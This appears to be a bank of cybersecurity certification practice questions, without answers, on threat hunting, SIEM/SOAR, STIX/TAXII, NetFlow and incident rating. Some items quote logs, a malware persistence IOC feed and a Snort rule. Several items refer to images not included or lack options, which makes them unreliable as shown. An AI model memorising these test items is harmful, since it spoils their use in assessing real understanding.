Joan is working as a security consultant to a company that runs a critical web application. She discovered that the application has a serious SQL injection vulnerability but the company cannot take the system offline during the two weeks required to revise the code. Which one of the following technologies would serve as the best compensating control?
IPS
WAF
Vulnerability scanning
Encryption
Questions 133–136 refer to the following scenario and image.
Bill is reviewing the authentication logs for a Linux system that he operates and encounters the following log entries:
Aug 30 09:46:54 ip-172-30-0-62 sshd[3051]: Accepted publickey for ec2-user from 10.174.238.88 port 57478 ssh2: RSA e5:f5:c1:46:bb:49:a1:43:da:9d:50:c5:37:bd:79:22Aug 30 09:46:54 ip-172-30-0-62 ssh[3051]: pam_unix[sshd:session]: session opened for user ec2-user by (uid=0)Aug 30 09:48:06 ip-172-30-0-62 sudo: ec2-user : TTY=ps/0 ; PWD=/home/ec2-user ; USER=root; COMMAND=/bin/bash
What is the IP address of the system where the user was logged in when they initiated the connection?
172.30.0.62
62.0.30.172
10.174.238.88
9.48.6.0
What service did the user use to connect to the server?
HTTPS
PTS
SSH
Telnet
What authentication technique did the user use to connect to the server?
Password
PKI
Token
Biometric
What account did the individual use to connect to the server?
root
ec2-user
bash
pam_unix
Lucca wants to identify systems that may have been compromised and are being used for data exfiltration. Which of the following technologies should he put into place to capture data that he can analyze using his SIEM to find this behavior?
A firewall
A NetFlow collector
A honeypot
A BGP monitor
Fred believes that the malware he is tracking uses a fast flux network and multiple download hosts. How many distinct hosts should he review based on the NetFlow shown here?
Fiona is considering a scenario in which components that her organization uses in their software that come from public GitHub repositories are trojaned. What should she do first to form the basis of her proactive threat hunting effort?
Search for examples of a similar scenario
Validate the software currently in use from the repositories
Form a hypothesis
Analyze the tools available for this type of attack
Jason is profiling a threat actor using STIX 2.0 and can choose among the following labels.
Individual
Club
Contest
Team
Organization
Government
What is he identifying?
Affiliation
Attack resource level
Certification level
Threat name
Tracy has reviewed the CrowdStrike writeup for an APT group known as HELIX KITTEN, which notes that the group is known for creating “thoroughly researched and structured spear-phishing messages relevant to the interests of targeted personnel.” What types of defenses are most likely to help if she identifies HELIX KITTEN as a threat actor of concern for her organization?
DKIM
An awareness campaign
Blocking all email from unknown senders
SPF
Micah wants to use the data he has collected to help with his threat hunting practice. What type of approach is best suited to using large volumes of log and analytical data?
Hypothesis-driven investigation
Investigation based on indicators of compromise
Investigation based on indications of attack
AI/ML-based investigation
Dani wants to analyze a malware package that calls home. What should she consider before allowing the malware to “phone home”?
Whether the malware may change behavior
Whether the host IP or subnet may become a target for further attacks
Attacks may be staged by the malware against other hosts
All of the above
After conducting an nmap scan of his network from outside of his network, James notes that a large number of devices are showing three TCP ports open on public IP addresses: 9100, 515, and 631. What type of devices has he found, and how could he reduce his organization's attack surface?
As part of her threat-hunting activities, Olivia bundles her critical assets into groups. Why would she choose to do this?
To increase complexity of analysis
To leverage similarity of threat profiles
To mix sensitivity levels
To provide a consistent baseline for threats
Unusual outbound network traffic, abnormal HTML response sizes, DNS request anomalies, and mis-matched ports for application traffic are all examples of what?
Threat hunting
SCAP
Indicators of compromise
Continuous threat feeds
Alex is working to understand his organization's attack surface. Services, input fields in a web application, and communication protocols are all examples of what component of an attack surface evaluation?
Threats
Attack vectors
Risks
Surface tension
Jiang wants to combine TAXII feeds with his own threat analysis information. What standard can he use to ensure that his data works across multiple systems without needing to be converted?
SAML
XHTML
STIX
YELLOW
Naomi wants to improve the detection capabilities for her security environment. A major concern for her company is detection of insider threats. What type of technology can she deploy to help with this type of proactive threat detection?
IDS
UEBA
SOAR
SIEM
Ling wants to use her SOAR platform to handle phishing attacks more effectively. What elements of potential phishing emails should she collect as part of her automation and workflow process to triage and assign severity indicators?
Subject lines
Email sender addresses
Attachments
All of the above
Isaac wants to write a script to query the BotScout forum bot blacklisting service. What data should he use to query the service based on the following image?
Email address
Name
IP address
Date
Syslog, APIs, email, STIX/TAXII, and database connections are all examples of what for a SOAR?
IOCs
Methods of data ingestion
SCAP connections
Attack vectors
Talos provides the BASS automated signature synthesizer tool due to modern challenges with malware. What major problem drives increasing use of automated malware signature creation tools?
More complex malware
Huge numbers of new malware signatures
Hash-based signatures take too long to create manually
Sandboxing is no longer effective
Yaan uses multiple data sources in his security environment, adding contextual information about users from Active Directory, geolocation data, multiple threat data feeds, as well as information from other sources to improve his understanding of the security environment. What term describes this process?
Data drift
Threat collection
Threat centralization
Data enrichment
When a DLP system is monitoring copy/paste, data displayed on a screen or captured from the screen, printing, and similar activities, what term describes the data's state?
Data at rest
Data in motion
Data in use
Data execution
Mila is reviewing feed data from the MISP open source threat intelligence tool and sees the following entry:
"Unit 42 has discovered a new malware family we've named"Reaver" with ties to attackers who use SunOrcal malware. SunOrcal activity has been documented to at least 2013, and based on metadata surrounding some of the C2s, may have been active as early as 2010. The new family appears to have been in the wild since late 2016 and to date we have only identified 10 unique samples, indicating it may be sparingly used. Reaver is also somewhat unique in the fact that its final payload is in the form of a Control panel item, or CPL file. To date, only 0.006% of all malware seen by Palo Alto Networks employs this technique, indicating that it is in fact fairly rare.", "Tag": [{"colour": "#00223b", "exportable": true, "name": "osint:source-type="blog-post""}], "disable_correlation": false, "object_relation": null, "type": "comment"}, {"comment": "", "category": "Persistence mechanism", "uuid": "5a0a9d47-1c7c-4353-8523-440b950d210f", "timestamp": "1510922426", "to_ids": false, "value": "%COMMONPROGRAMFILES%\services\", "disable_correlation": false, "object_relation": null, "type": "regkey"}, {"comment": "", "category": "Persistence mechanism", "uuid": "5a0a9d47-808c-4833-b739-43bf950d210f", "timestamp": "1510922426", "to_ids": false, "value": "%APPDATA%\microsoft\mmc\", "disable_correlation": false, "object_relation": null, "type": "regkey"}, {"comment": "", "category": "Persistence mechanism", "uuid": "5a0a9d47-91e0-4fea-8a8d-48ce950d210f", "timestamp": "1510922426", "to_ids": false, "value": "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Common Startup"
How does the Reaver malware maintain persistence?
A blog post
Inserts itself into the Registry
Installs itself as a runonce key
Requests user permission to start up
Isaac's organization has deployed a security tool that learns how network users typically behave and then searches for differences that match attack behaviors. What type of system can automatically analyze this data to build detection capability like this?
Signature-based analysis
A Babbage machine
Machine learning
Artificial network analysis
What is the advantage of a SOAR system over a traditional SIEM system?
SOAR systems are less complex to manage.
SOAR systems handle large log volumes better using machine learning.
SOAR systems integrate a wider range of internal and external systems.
SOAR logs are transmitted only over secure protocols.
What protocol does the U.S. government use to represent the data stored in the National Vulnerability Database?
STIX
CVSS
SCAP
CPE
Brian is on the development team that his company has tasked with maintaining their organization's web application. He and his coworkers check code in multiple times a day, and the code is then verified and tested automatically. What is this practice called?
Continuous delivery
Repo-stuffing
Continuous integration
Time coding
Fiona has continued her threat hunting efforts, and has formed a number of hypotheses. What key issue should she consider when she reviews them?
The number of hypotheses
Her own natural biases
Whether they are strategic or operational
If the attackers know about them
Mila is categorizing an actor using STIX 2.0 and wants to describe an actor that is responsible for APT-level attacks. What STIX threat actor sophistical level best fits this type of actor?
Intermediate
Advanced
Expert
Strategic
Christina wants to describe a threat actor's motivations, abilities, capabilities, and responses. What open standard markup language can she use to do this?
TAXII
OAuth
STIX
STONES
Alaina adds the openphish URL list to her SOAR tool and sees the following entries:
What action should she take based on phishing URLs like these?
Block the IP address at her border firewall
Monitor for the IP address using her IDS
Delete emails with the URL from inbound email
Nothing, as these have not been confirmed
Rowan wants to block drive-by-downloads and bot command and control channels while redirecting potentially impacted systems to a warning message. What should she implement to do this?
A DNS sinkhole
A WAF
An IDS
A UEBA
What type of malware technique hides its command and control servers within a large number of possible suspects?
Polymorphic domain malware
Domain generation algorithms
Hostname multipliers
ICA spoofers
Alex configured a Snort rule that reads:
alert tcp any any -> any 22 (mst: "Detected!”; sid 10000004;)
What will Alex's rule typically detect?
FTP traffic
Telnet traffic
SMTP traffic
SSH traffic
Michelle wants to implement a static analysis security testing (SAST) tool into her continuous integration pipeline. What challenge could she run into if her organization uses multiple programming languages for components of their application stack that will be tested?
They will have to ensure the scanner works with all of the languages chosen.
They will have to compile all of the code to the same binary output language.
They will have to run the applications in a sandbox.
They will have to run the applications under the same execution environment.
Nina configures her IPS to detect and stop attacks based on signatures. What type of attacks will she block?
New attacks based on behavior
Previously documented attacks that match the signatures
Previously documented attacks and similar attacks based on the signatures
All of the above
Nathan wants to determine which systems are sending the most traffic on his network. What low overhead data gathering methodology can he use to view traffic sources, destinations, and quantities?
A network sniffer to view all traffic
Implement NetFlow
Implement SDWAN
Implement a network tap
Use the following table and rating information for questions 171–173.
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) uses a 1–100 scale for incident prioritization, with weight assigned to each of a number of categories. The functional impact score is weighted in their demonstration as follows:
Functional impact
Rating
No impact
0
No impact to services
20
Minimal impact to noncritical services
35
Minimal impact to critical services
40
Significant impact to noncritical services
50
Denial of noncritical services
60
Significant impact to critical services
70
Denial of critical services or loss of control
100
Nathan discovers a malware package on an end user workstation. What rating should he give this if he is considering organization impact based on the table shown?
No impact
No impact to services
Denial of noncritical services
Denial of critical services or loss of control
Nathan's organization uses a software-as-a-service (SaaS) tool to manage their customer mailing lists, which they use to inform customers of upcoming sales a week in advance. The organization's primary line of business software continues to function and merchandise can be sold. Due to a service outage, they are unable to add new customers to the list for a full business day. How should Nathan rate this local impact issue during the outage?
Minimal impact to noncritical services
Minimal impact to critical services
Significant impact to noncritical services
Denial of noncritical services
During an investigation into a compromised system, Nathan discovers signs of an advanced persistent threat (APT) resident in his organization's administrative systems. How should he classify this threat?
Significant impact to noncritical services
Denial of noncritical services
Significant impact to critical services
Denial of critical services or loss of control
Adam is reviewing a Wireshark packet capture in order to perform protocol analysis, and he notes the following data in the Wireshark protocol hierarchy statistics. What percentage of traffic is most likely encrypted web traffic?
85.9 percent
1.7 percent
20.3 percent
1.9 percent
Annie is reviewing a packet capture that she believes includes the download of malware. What host should she investigate further as the source of the malware based on the activity shown in the following image from her packet analysis efforts?
172.17.8.8
49.51.172.56
172.17.8.172
56.172.51.49
While reviewing IPS logs, Annie finds the following entry:
ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)
What should her next action be?
Run an antimalware scan of the system associated with the detection
Block inbound traffic from the external system associated with the infection
Block outbound traffic to the external system associated with the infection
Nothing, as this is a false positive due to an expired certificate
Steve uploads a malware sample to an analysis tool and receives the following messages:
>Executable file was dropped: C:Logsmffcae1.exe>Child process was created, parent C:Windowssystem32cmd.exe>mffcae1.exe connects to unusual port>File downloaded: cx99.exe
If he wanted to observe the download behavior himself, what is the best tool to capture detailed information about what occurs?
An antimalware tool
Wireshark
An IPS
Network flows
Abdul is analyzing proxy logs from servers that run in his organization and notices two proxy log servers have entries for similar activities that always occur one hour apart from each other. Both proxy servers are in the same data center, and the activity is part of a normal evening process that runs at 7 p.m. One proxy server records the data at 7 p.m., one records the entry at 6 p.m. What issue has Abdul likely encountered?
A malware infection emulating a legitimate process
An incorrect time zone setting
A flaw in the automation script
A log entry error
Eric is performing threat intelligence work and wants to characterize a threat actor that his organization has identified. The threat actor is similar to the group known as Anonymous and has targeted organizations for political reasons in the past. How should he characterize this threat actor?
Unwitting insiders
Unknown
APT
Hacktivist
Melissa is using the US-CERT's scale to measure the impact of the location of observed activity by a threat actor. Which of the following should be the highest rated threat activity location?
Critical system DMZ
Business network
Business DMZ
Safety systems
Gavin wants to deploy a NAC solution. Which of the following is a validation technique that an agent-based NAC system can use?
Current operating system patch status
Network VLAN or security zone assignment
Antimalware or antivirus update status
All of the above
What information is used to determine which systems can connect to a network port protected by port security?
IP address
Hostname
MAC address
UserID and password
What do DLP systems use to classify data and to ensure that it remains protected?
Data signatures
Business rules
Data egress filters
Data at rest
Jana wants to configure her IPS to block a recently discovered denial of service condition that impacts her Apache web server. What is the most effective method of implementing this quickly if her IPS is provided by a commercial vendor?
Research the denial-of-service attack and write a custom detection rule
Block all traffic to the web servers until a patch is installed
Configure a signature-based rule using a signature provided by the vendor
Research the denial-of-service attack, and then use the first released exploit proof of concept to build a signature to detect the attack
Zhi wants to capture network flows from her network as shown in the following image. Where should she collect network flows to balance maximum visibility without collecting unnecessary information?
Point A
Point B
Point C
Point D
Benicio wants to implement a tool for all the workstations and laptops in his company that can combine behavioral detection of indicators of attack based on current threat intelligence with real-time visibility into the systems. What sort of tool should he select?
An IPS
An EDR
A CRM
A UEBA
Benita needs to change the permissions on a file named public_secrets.txt stored on a Linux server, and she wants to make the file readable to all users on the system.
The file is currently set to:
rwx------
What command can she use to do this without providing the ability to execute or write to the file?
chmod 777 public_secrets.txt
chmod 744 public_secrets.txt
chmod public_secrets.txt 777
chmod 447 public_secrets.txt
Eric wants to analyze a malware binary in the safest way possible. Which of the following methods has the least likelihood of allowing the malware to cause problems?
Run the malware on an isolated VM
Perform dynamic analysis of the malware in a sandbox
Perform static analysis of the malware
Run the malware in a container service
Tom wants to improve his detection capabilities for his software-as-a-service (SaaS) environment. What technology is best suited to give him a view of usage, data flows, and other details for cloud environments?
EDR
CASB
IDS
SIEM
Chuck wants to identify a tool to provision servers, create virtual servers and assign storage to them, and configure networking and security policies. What type of tool should he consider?
Scripting
APIs
Workflow orchestration
SCAP
What advantages does TAXII provide for threat feed combination?
Interoperability between security tools
Confidentiality and integrity of data
Greater speed for sharing of data
All of the above
A production environment with “blue” and “green” deployments in parallel, with one live and one updated to the newest code, is an example of what type of pipeline?
Continuous integration
Waterfall
Spiral
Continuous delivery
Joseph's antimalware package detects new malware by examining code for suspicious properties. What type of technique is this an example of?
Fagan code inspection
Heuristic analysis
Machine learning
Artificial intelligence
Isaac wants to identify known good behavior patterns for all of the applications that his organization uses. If he doesn't want to have a staff member review logs and behaviors for every application in every scenario it is run, what type of analytical tool would best be suited to dealing with this volume and type of data?
Trend analysis
Machine learning
Manual analysis
Endpoint analysis
Juan wants to audit filesystem activity in Windows and configures Windows filesystem auditing. What setting can he set to know if a file was changed or not using Windows file auditing?
Set Detect Change
Set Validate File Versions
Set Audit Modifications
None of the above
Naomi wants to analyze URLs found in her passive DNS monitoring logs to find DGA (domain generation algorithm) generated command and control links. What techniques are most likely to be useful for this?
WHOIS lookups and NXDOMAIN queries of suspect URLs
Querying URL whitelists
DNS probes of command-and-control networks
Natural language analysis of domain names
Derek's organization has been working to recover from a recent malware infection that caused outages across the organization during an important part of their business cycle. In order to properly triage, what should Derek pay the most attention to first?
The immediate impact on operations so that his team can restore functionality
The total impact of the event so that his team can provide an accurate final report
The immediate impact on operations so that his team can identify the likely threat actor
The total impact of the event so that his team can build a new threat model for future use
Kathleen wants to ensure that her team of security analysts sees important information about the security status of her organization whenever they log in to the SIEM. What part of a SIEM is designed to provide at-a-glance status information?
The reporting engine
Email reports
The dashboard
The ruleset
Lucca is reviewing bash command history logs on a system that he suspects may have been used as part of a breach. He discovers the following grep command run inside of the /users directory by an administrative user. What will the command find?
Grep -r "sudo" /home/users/ | grep "bash.log"
All occurrences of the sudo command on the system
All occurrences of root logins by users
All occurrences of the sudo command in bash log files in user home directories
All lines that do not contain the word sudo or bash.log in user directories
Munju wants to test her organization's email for malicious payloads. What type of tool should she select to perform this action?